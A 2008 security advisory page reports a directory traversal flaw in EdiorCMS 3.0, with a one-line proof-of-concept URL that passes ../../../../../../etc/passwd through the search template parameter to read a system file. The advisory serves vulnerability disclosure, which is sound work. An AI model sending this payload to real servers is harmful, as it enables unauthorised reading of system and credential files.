Computer Security

Security Advisory: Directory traversal in EdiorCMS V3.0
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  XSS in PHP-Nuke (eWeather module)

  Powered by phpBB 2001, 2006 (SQL)

  travelsized cms 0.4.1 multiple local file inclusion vulnerabilities

  uberghey cms 0.3.1 multiple local file inclusion vulnerabilities

From:wsn1983_(at)_gmail.com <wsn1983_(at)_gmail.com>
Date:13.03.2008
Subject:Directory traversal in EdiorCMS V3.0

Directory traversal in EdiorCMS V3.0

Application:  EdiorCMS V3.0
Vendor:       http://www.edior.com      
Versions:     3.0
Platforms:    ALL
Bug:          Directory traversal
Exploitation: remote
Date:         13 Mar 2008
Author:       Shennan Wang
             e-mail: wsn1983@gmail.com
POC:          http://site/ecms/search.
php?_SearchKeyWord=&_SearchField=Title&_SearchTemplate=../../../../../..
/etc/passwd
             
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru